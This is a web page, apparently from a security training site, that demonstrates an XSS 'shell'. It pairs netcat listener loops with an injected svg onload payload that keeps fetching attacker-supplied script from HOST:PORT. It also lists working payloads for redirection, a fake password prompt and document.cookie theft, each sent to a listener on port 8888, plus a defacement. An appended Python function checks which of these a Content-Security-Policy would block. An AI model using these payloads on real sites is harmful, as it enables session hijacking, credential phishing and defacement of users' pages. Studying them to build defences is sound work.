So this is kinda fun. With this page open, copy and paste one of the listener commands from below into a terminal window on your local machine. Then, paste alert(42) into the resulting shell and press "Enter". Once you recover from the initial shock of what you just witnessed, play with the following payloads and spend the next hour of your life thoroughly enjoying yourself.
Listeners
Linux
while :; do printf "j$ "; read c; printf "HTTP/1.1 200 OK\n\n$c" | nc -lp 8000 >/dev/null; done
OS X
while :; do printf "j$ "; read c; printf "HTTP/1.1 200 OK\n\n$c" | nc -l 8000 >/dev/null; done
Example Payloads
Redirection
window.location = 'https://www.practisec.com/training/'
Phishing
i=new Image();i.src="http://127.0.0.1:8888/pw/"+prompt("Password:")
- Requires a second listener, e.g. python -m "SimpleHTTPServer" 8888.
Session Hijacking
i=new Image();i.src="http://127.0.0.1:8888/pw/"+document.cookie
- Requires a second listener, e.g. python -m "SimpleHTTPServer" 8888.
Defacement
d=document;e=d.createElement("p");e.innerHTML="lanmaster53 wuz here!";d.body.appendChild(e)
Credits
This is all based on the code shared in the following tweets.
XSShell - Target
<svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
— Brute (@brutelogic) September 2, 2015
XSShell - Attacker
$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
— Brute (@brutelogic) September 2, 2015
Check the source code here ^^^ for the active payload.
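The page leaves the defensive side implicit, so here is an added example (not part of the original post, nor Brute's or lanmaster53's code) that checks which of the mechanisms above a given Content-Security-Policy header value would stop: the polling script tag, the inline svg onload handler, and the image beacon. It assumes the protected page's origin is https://www.practisec.com, models only host sources, 'self', '*', 'none' and 'unsafe-inline' (no nonces or hashes), and treats the HOST:PORT placeholder literally.

```python
from urllib.parse import urlsplit
PAGE_ORIGIN = "https://www.practisec.com"  # assumed origin of the protected page
# The page's payload mechanisms and the CSP directive governing each (constructed
# table; HOST:PORT is the page's placeholder; "inline" means an inline handler).
VECTORS = {
    "polling <script src=//HOST:PORT>": ("script-src", "//HOST:PORT"),
    "inline <svg onload=...> handler": ("script-src", "inline"),
    "image beacon to 127.0.0.1:8888": ("img-src", "http://127.0.0.1:8888/pw/"),
}
def parse_csp(policy):
    """Header value -> {directive: [source expressions]}."""
    parts = [p.split() for p in policy.split(";") if p.strip()]
    return {p[0].lower(): p[1:] for p in parts}

def host_matches(expr, target):
    """Match a host-source (optional scheme, '*.' wildcard, port) against a URL."""
    scheme, _, rest = expr.rpartition("://")
    t = urlsplit(target)
    if scheme and t.scheme and scheme.lower() != t.scheme:
        return False
    host, _, port = rest.partition(":")
    thost, _, tport = t.netloc.partition(":")
    if port != tport and port != "*":  # no port in expr matches only the default port
        return False
    if host.startswith("*."):
        return thost.lower().endswith(host[1:].lower())
    return host.lower() == thost.lower()

def allowed(sources, target):
    """Simplified source-list check: 'self', '*', host sources; no nonces/hashes."""
    if target == "inline":
        return "'unsafe-inline'" in sources
    t = urlsplit(target)
    origin = (t.scheme or urlsplit(PAGE_ORIGIN).scheme) + "://" + t.netloc
    for s in sources:
        if s == "*" or (s == "'self'" and origin.lower() == PAGE_ORIGIN):
            return True
        if not s.startswith("'") and host_matches(s, target):
            return True
    return False

def blocked_vectors(policy):
    """Names of the page's mechanisms that this policy would stop."""
    dirs = parse_csp(policy)
    blocked = []
    for name, (directive, target) in VECTORS.items():
        sources = dirs.get(directive, dirs.get("default-src"))  # fetch directives fall back
        if sources is not None and not allowed(sources, target):
            blocked.append(name)
    return blocked
```

The window.location redirect is deliberately absent from the table: navigation is not governed by CSP, and the injection itself is removed by encoding output, not by headers; CSP only limits what an injected payload can reach.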
Please share your thoughts, comments, and suggestions via Twitter.